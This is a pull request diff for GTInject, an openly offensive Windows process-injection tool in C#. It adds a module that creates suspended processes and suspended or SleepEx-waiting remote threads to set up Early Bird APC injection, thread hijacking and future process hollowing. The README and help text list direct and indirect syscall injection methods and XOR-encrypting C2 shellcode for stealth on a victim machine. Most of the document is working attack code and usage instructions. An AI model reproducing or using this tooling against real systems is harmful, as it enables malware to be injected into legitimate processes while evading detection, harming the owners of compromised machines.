### PR TITLE
Create module and minor updates

### DIFF
--- a/GTInject/GTInject.csproj
+++ b/GTInject/GTInject.csproj
@@ -69,6 +69,7 @@
     <Compile Include="Novel\Novel.cs" />
     <Compile Include="Novel\ThreadlessInject.cs" />
     <Compile Include="Util\Alertable.cs" />
+    <Compile Include="Util\CreateModule.cs" />
     <Compile Include="Util\EncryptBin.cs" />
     <Compile Include="Util\GetShellcode.cs" />
     <Compile Include="Inject.cs" />

--- a/GTInject/Inject.cs
+++ b/GTInject/Inject.cs
@@ -19,6 +19,7 @@ namespace GTInject
             threads,
             inject,
             encrypt,
+            create,
             help
         }
   
@@ -162,25 +163,43 @@ ThreadExec Options
             }
 
             else if (command.ToLower() == "create"){
+                string createObject;
+                string createObjectInfo;
+                try
+                {
+                    createObject = args[1].ToString();
+                    createObjectInfo = args[2].ToString();
+                }
+                catch
+                {
+                    Console.WriteLine("Try again, read the help menu. Should be GTInject create something something like GTInject.exe create process C:\\windows\\system32\\netsh.exe");
+                    return;
+                }
                 // TODO : create mode flags. create process
                 // gtinject create process "C:\Windows\System32\netsh.exe"
-                var processInfo = args[2].ToString(); // This will either be a string, or an int, so lets bring it back as str now and flip to int when needed
-                if (args[1] == "process")
+                var processInfo = createObjectInfo; // This will either be a string, or an int, so lets bring it back as str now and flip to int when needed
+                if (createObject == "process")
                 {
                     Console.WriteLine("Creating suspended process " + processInfo);
                     var createdProcInfo = CreateModule.CreateSuspendedProcess(processInfo);
                     Console.WriteLine("Created: heres your PROCESS_INFORMATION : " + createdProcInfo);
                 }
-                else if (args[1] == "thread")
+                else if (createObject == "thread")
                 {
-                    var createModProcessID = int.Parse(processInfo);
+                    var createModProcessID = int.Parse(createObjectInfo);
                     Console.WriteLine("Creating suspended thread in existing process " + createModProcessID);
                     var createdThreadInfo = CreateModule.CreateSuspendedThread((uint)createModProcessID, IntPtr.Zero); // specifying an empty StartAddress for this thread if this will work
-                    Console.WriteLine("Thread created with empty start address : " + createdThreadInfo);
+                    Console.WriteLine("Thread created with empty start address with Handle in Decimal: " + createdThreadInfo);
                 }
-                else if(args[1] == "sleepThread")
+                else if(createObject == "sleepThread")
                 {
-                    Console.WriteLine("todo");
+                    //Doesn't currently work as desired. Successfully creates the thread in the delayexecution state, but injection doesn't the same, thread just sleeps, then exits, no injection takes place, despite success from injection calls
+                    Console.WriteLine("Will create a thread that sleeps for 2 minutes, but APC injection here doesn't currently work. TBD");
+                    var createModProcessID = int.Parse(createObjectInfo);
+                    Console.WriteLine("Creating thread in DelayExecution state for Process ID " + createModProcessID);
+                    var createdThreadInfo = CreateModule.CreateDelayedExecutionThread((uint)createModProcessID);
+                    Console.WriteLine("Thread created with empty start address with Handle in Decimal: " + createdThreadInfo);
+
                 }
                 else
                 {

--- a/GTInject/Inject.cs
+++ b/GTInject/Inject.cs
@@ -50,6 +50,7 @@ Usage: GTInject.exe <module> <moduleArgs>
 
 Modules: 
     Encrypt
+    Create
     Threads
     Inject
 
@@ -61,8 +62,15 @@ Encrypt:
 
         Do this in preparation, not on the C2 victim machine.
 
+Create:
+        -- GTInject.exe create <process||thread||sleepThread> <ProcessPath||PID>
+        Used to create new processes or threads in Suspended states, or things like Early Bird injection or QueueUserAPC injection or Process Hollowing
+        create process C:\Windows\System32\netsh.exe -- this would launch netsh.exe in a suspended state, use the inject module later
+        create thread 12345 -- this would create a new suspended thread in an existing Process ID
+        create sleepthread 12345 -- this would create a new thread in a DelayExecution wait state (by calling kernel32!Sleep in the newly created thread)
+
 Threads:
-        -- GTInject.exe threads alertable 10234 --
+                --GTInject.exe threads alertable 10234 --
         Specify 'alertable' or 'all' threads
         Optionally specify a process ID
         Default will list all threads in an alertable state for all processes. Filters out low integrity processes to avoid isolated AppContainer threads.

--- a/GTInject/Inject.cs
+++ b/GTInject/Inject.cs
@@ -59,12 +59,14 @@ Encrypt:
 Create:
         -- GTInject.exe create <process||thread||sleepThread> <ProcessPath||PID>
         Used to create new processes or threads in Suspended states, or things like Early Bird injection or QueueUserAPC injection or Process Hollowing
-        create process C:\Windows\System32\netsh.exe -- this would launch netsh.exe in a suspended state, use the inject module later
+        
+        create process ""C:\Windows\System32\netsh.exe"" -- this would launch netsh.exe in a suspended state, use the inject module later
         create thread 12345 -- this would create a new suspended thread in an existing Process ID
-        create sleepthread 12345 -- this would create a new thread in a DelayExecution wait state (by calling kernel32!Sleep in the newly created thread)
+        create sleepThread 12345 -- this would create a new thread in a DelayExecution wait state (by calling kernel32!SleepEx in the newly created thread)
+            sleepThread works with APC injection, but NOT with Thread Hijacking (get/setThreadContext) - APC was the goal, so I'm calling this 'working as designed'
 
 Threads:
-                --GTInject.exe threads alertable 10234 --
+        --GTInject.exe threads alertable 10234 --
         Specify 'alertable' or 'all' threads
         Optionally specify a process ID
         Default will list all threads in an alertable state for all processes. Filters out low integrity processes to avoid isolated AppContainer threads.
@@ -191,10 +193,11 @@ ThreadExec Options
                     var createdThreadInfo = CreateModule.CreateSuspendedThread((uint)createModProcessID, IntPtr.Zero); // specifying an empty StartAddress for this thread if this will work
                     Console.WriteLine("Thread created with empty start address with Handle in Decimal: " + createdThreadInfo);
                 }
-                else if(createObject == "sleepThread")
+                else if(createObject.ToLower() == "sleepthread")
                 {
                     //Doesn't currently work as desired. Successfully creates the thread in the delayexecution state, but injection doesn't the same, thread just sleeps, then exits, no injection takes place, despite success from injection calls
                     Console.WriteLine("Will create a thread that sleeps for 2 minutes, but APC injection here doesn't currently work. TBD");
+                    Console.WriteLine("  Currently works with Thread Hijacking (getthreadcontext, setthreadcontext) but only triggers after the 2 minutes timer is finished");
                     var createModProcessID = int.Parse(createObjectInfo);
                     Console.WriteLine("Creating thread in DelayExecution state for Process ID " + createModProcessID);
                     var createdThreadInfo = CreateModule.CreateDelayedExecutionThread((uint)createModProcessID);

--- a/GTInject/Inject.cs
+++ b/GTInject/Inject.cs
@@ -1,15 +1,8 @@
 ﻿using System;
-using System.Collections.Generic;
-using System.Linq;
-using System.Text;
-using System.Threading.Tasks;
-using System.Globalization;
 using GTInject.memoryOptions;
 using GTInject.Injection;
 using System.Diagnostics;
-using System.Diagnostics.SymbolStore;
-using GTInject.Novel;
-using System.Net.Sockets;
+using GTInject.Util;
 
 namespace GTInject
 {
@@ -171,6 +164,28 @@ ThreadExec Options
             else if (command.ToLower() == "create"){
                 // TODO : create mode flags. create process
                 // gtinject create process "C:\Windows\System32\netsh.exe"
+                var processInfo = args[2].ToString(); // This will either be a string, or an int, so lets bring it back as str now and flip to int when needed
+                if (args[1] == "process")
+                {
+                    Console.WriteLine("Creating suspended process " + processInfo);
+                    var createdProcInfo = CreateModule.CreateSuspendedProcess(processInfo);
+                    Console.WriteLine("Created: heres your PROCESS_INFORMATION : " + createdProcInfo);
+                }
+                else if (args[1] == "thread")
+                {
+                    var createModProcessID = int.Parse(processInfo);
+                    Console.WriteLine("Creating suspended thread in existing process " + createModProcessID);
+                    var createdThreadInfo = CreateModule.CreateSuspendedThread((uint)createModProcessID, IntPtr.Zero); // specifying an empty StartAddress for this thread if this will work
+                    Console.WriteLine("Thread created with empty start address : " + createdThreadInfo);
+                }
+                else if(args[1] == "sleepThread")
+                {
+                    Console.WriteLine("todo");
+                }
+                else
+                {
+                    Console.WriteLine("No valid create module arguments were given");
+                }
             }
 
             else if (command.ToLower() == "inject")

--- a/GTInject/Inject.cs
+++ b/GTInject/Inject.cs
@@ -160,6 +160,11 @@ ThreadExec Options
                 try { AlertableThreads.Alertable.GetThreads(threadsToReturn, optionalPidForThreads); } catch (Exception ex) { Console.WriteLine(ex.ToString()); }
             }
 
+            else if (command.ToLower() == "create"){
+                // TODO : create mode flags. create process
+                // gtinject create process "C:\Windows\System32\netsh.exe"
+            }
+
             else if (command.ToLower() == "inject")
             {
                 //  GTInject.exe inject memoryOption execOption xorkey binSrcType binSourcePath PID TID
@@ -214,7 +219,7 @@ ThreadExec Options
                             var resp = ThreadExec.SelectThreadOption(memoryResponse, execOption, pidResp, Tid);
                             return;
                         }
-                        
+
                     }
 
                     // In the right circumstance, you could technically inject twice doing this, once in a valid memoption, and again here. 

--- a/GTInject/SysCalls/WinNative.cs
+++ b/GTInject/SysCalls/WinNative.cs
@@ -768,14 +768,71 @@ namespace GTInject.SysCalls
             public ulong LastExceptionFromRip;
         }
 
+        [Flags]
+        public enum ProcessCreationFlags : uint
+        {
+            CREATE_SUSPENDED = 0x00000004
+        }
+
+        [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
+        public struct STARTUPINFO
+        {
+            public uint cb;
+            public string lpReserved;
+            public string lpDesktop;
+            public string lpTitle;
+            public uint dwX;
+            public uint dwY;
+            public uint dwXSize;
+            public uint dwYSize;
+            public uint dwXCountChars;
+            public uint dwYCountChars;
+            public uint dwFillAttribute;
+            public uint dwFlags;
+            public ushort wShowWindow;
+            public ushort cbReserved2;
+            public IntPtr lpReserved2;
+            public IntPtr hStdInput;
+            public IntPtr hStdOutput;
+            public IntPtr hStdError;
+        }
+
+        [StructLayout(LayoutKind.Sequential)]
+        public struct PROCESS_INFORMATION
+        {
+            public IntPtr hProcess;
+            public IntPtr hThread;
+            public uint dwProcessId;
+            public uint dwThreadId;
+        }
+
+        [DllImport("kernel32.dll", SetLastError = true)]
+        public static extern IntPtr OpenProcess(
+            ProcessAccess processAccess,
+            bool bInheritHandle,
+            uint processId);
+
+
+        [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
+        public static extern bool CreateProcess(
+            string lpApplicationName,
+            string lpCommandLine,
+            IntPtr lpProcessAttributes,
+            IntPtr lpThreadAttributes,
+            bool bInheritHandles,
+            ProcessCreationFlags dwCreationFlags,
+            IntPtr lpEnvironment,
+            string lpCurrentDirectory,
+            ref STARTUPINFO lpStartupInfo,
+            out PROCESS_INFORMATION lpProcessInformation);
 
         [DllImport("ntdll.dll")]
         public static extern NTSTATUS NtReadVirtualMemory(
-    IntPtr processHandle,
-    IntPtr baseAddress,
-    IntPtr buffer,
-    uint bytesToRead,
-    ref uint bytesRead);
+            IntPtr processHandle,
+            IntPtr baseAddress,
+            IntPtr buffer,
+            uint bytesToRead,
+            ref uint bytesRead);
 
         [DllImport("kernel32.dll", SetLastError = true)]
         [return: MarshalAs(UnmanagedType.Bool)]
@@ -783,29 +840,28 @@ namespace GTInject.SysCalls
 
         [DllImport("ntdll.dll")]
         public static extern NTSTATUS NtFreeVirtualMemory(
-    IntPtr processHandle,
-    ref IntPtr baseAddress,
-    ref UIntPtr regionSize,
-    AllocationType freeType);
+            IntPtr processHandle,
+            ref IntPtr baseAddress,
+            ref UIntPtr regionSize,
+            AllocationType freeType);
 
 
         [DllImport("ntdll.dll")]
         public static extern void RtlInitUnicodeString(
-    ref UNICODE_STRING destinationString,
-    [MarshalAs(UnmanagedType.LPWStr)] string sourceString);
+            ref UNICODE_STRING destinationString,
+            [MarshalAs(UnmanagedType.LPWStr)] string sourceString);
 
         [DllImport("ntdll.dll")]
         public static extern NTSTATUS LdrLoadDll(
-    IntPtr filePath,
-    uint dwFlags,
-    ref UNICODE_STRING moduleFileName,
-
-    ref IntPtr moduleHandle);
+            IntPtr filePath,
+            uint dwFlags,
+            ref UNICODE_STRING moduleFileName,
+            ref IntPtr moduleHandle);
 
         [DllImport("kernel32.dll", SetLastError = true, CallingConvention = CallingConvention.Winapi)]
         [return: MarshalAs(UnmanagedType.Bool)]
         public static extern bool IsWow64Process([In] IntPtr processHandle,
-[Out, MarshalAs(UnmanagedType.Bool)] out bool wow64Process);
+            [Out, MarshalAs(UnmanagedType.Bool)] out bool wow64Process);
 
 
         [DllImport("kernel32.dll")]

--- a/GTInject/SysCalls/WinNative.cs
+++ b/GTInject/SysCalls/WinNative.cs
@@ -806,6 +806,11 @@ namespace GTInject.SysCalls
             public uint dwThreadId;
         }
 
+
+        [DllImport("kernel32.dll", SetLastError = true)]
+        public static extern uint GetThreadId(IntPtr hThread);
+
+
         [DllImport("kernel32.dll", SetLastError = true)]
         public static extern IntPtr OpenProcess(
             ProcessAccess processAccess,
@@ -813,7 +818,7 @@ namespace GTInject.SysCalls
             uint processId);
 
 
-        [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
+        [DllImport("kernel32.dll", SetLastError = true)]
         public static extern bool CreateProcess(
             string lpApplicationName,
             string lpCommandLine,
@@ -869,6 +874,9 @@ namespace GTInject.SysCalls
 
         [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
         public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
+        
+        [DllImport("kernel32.dll", SetLastError = true)]
+        public static extern IntPtr GetModuleHandle(string lpModuleName);
 
 
         [DllImport("kernel32.dll")]

--- a/GTInject/Util/CreateModule.cs
+++ b/GTInject/Util/CreateModule.cs
@@ -1,0 +1,78 @@
+﻿using System;
+using System.Collections.Generic;
+using System.ComponentModel;
+using System.Linq;
+using System.Runtime.InteropServices;
+using System.Text;
+using System.Threading.Tasks;
+using static GTInject.SysCalls.WinNative;
+
+namespace GTInject.Util
+{
+    internal class CreateModule
+    {
+
+        public static PROCESS_INFORMATION CreateSuspendedProcess(string applicationPath)
+        {
+            STARTUPINFO startupInfo = new STARTUPINFO();
+            PROCESS_INFORMATION processInfo = new PROCESS_INFORMATION();
+
+            if (!CreateProcess(
+                applicationPath,
+                null,
+                IntPtr.Zero,
+                IntPtr.Zero,
+                false,
+                ProcessCreationFlags.CREATE_SUSPENDED,
+                IntPtr.Zero,
+                null,
+                ref startupInfo,
+                out processInfo))
+            {
+                throw new Win32Exception(Marshal.GetLastWin32Error());
+            }
+
+            return processInfo;
+        }
+
+
+
+        public static IntPtr CreateSuspendedThread(uint processId, IntPtr startAddress)
+        {
+            IntPtr hProcess = OpenProcess(
+                ProcessAccess.CreateThread |
+                ProcessAccess.QueryInformation |
+                ProcessAccess.VmOperation |
+                ProcessAccess.VmRead |
+                ProcessAccess.VmWrite,
+                false, processId);
+
+            if (hProcess == IntPtr.Zero)
+            {
+                throw new Win32Exception(Marshal.GetLastWin32Error());
+            }
+
+            IntPtr hThread = CreateRemoteThread(
+                hProcess,
+                IntPtr.Zero,
+                0,
+                startAddress,
+                IntPtr.Zero,
+                0x00000004, // CREATE_SUSPENDED
+                IntPtr.Zero);
+
+            if (hThread == IntPtr.Zero)
+            {
+                throw new Win32Exception(Marshal.GetLastWin32Error());
+            }
+
+            return hThread;
+        }
+        
+        // TODO: If possible, create other wait state threads - like DeleyExecution state threads
+        // DelayExecution is what it sounds like - basiclaly just means something is sleeping for a time. 
+        // Create thread with thread flags "immediate exectuion" but have the start address resolve to kernel32!Sleep for a defined time
+        // Thread should start and be waiting
+
+    }
+}

--- a/GTInject/Util/CreateModule.cs
+++ b/GTInject/Util/CreateModule.cs
@@ -91,7 +91,7 @@ namespace GTInject.Util
             }
 
             // Get the address of the Sleep function in the kernel32.dll
-            IntPtr sleepAddress = GetProcAddress(GetModuleHandle("kernel32.dll"), "Sleep");
+            IntPtr sleepAddress = GetProcAddress(GetModuleHandle("kernel32.dll"), "SleepEx");
 
             if (sleepAddress == IntPtr.Zero)
             {
@@ -103,7 +103,7 @@ namespace GTInject.Util
                 IntPtr.Zero,
                 0,
                 sleepAddress,
-                (IntPtr)120000, // 2 minutes of delay execution state, you should inject within this time frame or the thread just goes away
+                (IntPtr)(120000 | 0x80000000), // 2 minutes of delay execution state, you should inject within this time frame or the thread just goes away
                 0, // Immediate execution
                 IntPtr.Zero);
 

--- a/README.md
+++ b/README.md
@@ -71,7 +71,7 @@ OPTIONALLY specify the TID (not all options need a Thread ID).
         200. NTAPI   -- NtCreateSection, NtMapViewOfSection, RtlCopyMemory
         201. NTAPI   -- NtAllocateVirtualMemory, NtProtectVirtualMemory, NtWriteVirtualMemory
         300. SysCall -- Direct, NtAllocateVirtualMemory, NtProtectVirtualMemory, NtWriteVirtualMemory 
-        301. SysCall -- Direct, NtCreateSection, NtMapViewOfSection, RtlCopyMemory 
+        301. SysCall -- Direct, NtCreateSection, NtMapViewOfSection, RtlCopyMemory
         302. SysCall -- Indirect, NtAllocateVirtualMemory, NtProtectVirtualMemory, NtWriteVirtualMemory
         303. SysCall -- Indirect, NtCreateSection, NtMapViewOfSection, RtlCopyMemory
 
@@ -82,9 +82,12 @@ OPTIONALLY specify the TID (not all options need a Thread ID).
         200. NTAPI   -- NtCreateThreadEx
         201. NTAPI   -- RtlCreateUserThread
         202. NTAPI   -- NtQueueApcThread, NtResumeThread - Must Specify Thread ID
+        203. NTAPI   -- NtGetContextThread, NtSetContextThread - Thread ID Optional
         300. SysCall -- Direct, NtCreateThreadEx
         301. SysCall -- Direct, NtQueueApcThread, NtResumeThread - Must Specify Thread ID
         302. SysCall -- Indirect, NtCreateThreadEx
         303. SysCall -- Indirect, NtQueueApcThread, NtResumeThread - Must Specify Thread ID
+        304. Syscall -- Direct, NtGetContextThread, NtSetContextThread - Thread ID Optional
+        305. Syscall -- Indirect, NtGetContextThread, NtSetContextThread - Thread ID Optional
         400. Novel   -- ThreadlessInject, CreateEventW - does not honor memory option
         401. Novel   -- ThreadlessInject, LoadLibraryExW - does not honor memory option

--- a/README.md
+++ b/README.md
@@ -11,6 +11,7 @@ It is largely inspired by the flexibility given within Brute Ratel, which made o
 
 ## Usage: GTInject.exe \<module> \<moduleArgs>
        GTInject.exe threads
+       GTInject.exe create process netsh.exe
        GTInject.exe encrypt pathToSource.bin MySecretXorKey
        GTInject.exe inject memoryOption execOption xorkey binSrcType binSourcePath PID TID
 
@@ -22,8 +23,25 @@ It is largely inspired by the flexibility given within Brute Ratel, which made o
        GTInject.exe encrypt pathToSource.bin MySecretXorKey
 
 Shellcode from your C2 will be multibyte XOR'd and written in various formats.
-
 This is intended to help you use the injection option later with better OpSec.
+
+## Create  -- for creating suspended processes and threads
+
+        GTInject.exe create <process||thread||sleepThread> <ProcessPath||PID>
+
+Used to create new processes or threads in Suspended states, or things like Early Bird injection or QueueUserAPC injection or Process Hollowing
+
+```create process ""C:\Windows\System32\netsh.exe""```
+- This would launch netsh.exe in a suspended state, use the inject module later
+
+```create thread 12345```
+- This would create a new suspended thread in an existing Process ID
+
+```create sleepThread 12345```
+- This would create a new thread in a DelayExecution wait state (by calling kernel32!SleepEx in the newly created thread)
+
+Threads work with APC injection, but NOT with Thread Hijacking (get/setThreadContext). APC was the goal, so I'm calling this 'working as designed'
+
 
 ## Threads  -- check for alertable threads:
 
@@ -37,6 +55,8 @@ By default, it filters out low and untrusted process integrities.
 Options include `GTinject.exe threads <all or alertable> <optional PID filter>` 
 
 So you could show all threads in a process with `GTInject.exe threads all 4321`
+
+Use QueueUserAPC injection with Suspended or DelayExecution threads
 
 
 ## Inject   -- choose a process injection method
@@ -91,3 +111,9 @@ OPTIONALLY specify the TID (not all options need a Thread ID).
         305. Syscall -- Indirect, NtGetContextThread, NtSetContextThread - Thread ID Optional
         400. Novel   -- ThreadlessInject, CreateEventW - does not honor memory option
         401. Novel   -- ThreadlessInject, LoadLibraryExW - does not honor memory option
+
+
+### To Do
+- add Process Hollowing options now that the create module can give us a suspended process
+- refactor the 'embedded disk url' options to auto determine based on https - UNC - or embedded keyword, one less argument for the command line
+- As always, add more techniques (Thread Pool Party would be nice)


### PR DESCRIPTION
I added the 'create' module to allow for creating new suspended processes, or new suspended threads in existing processes. This will help with APC injection options, including Early Bird APC Injection, and allows future opportunity for Process Hollowing methods. 

Other minor documentation, help menu, and code fix updates. 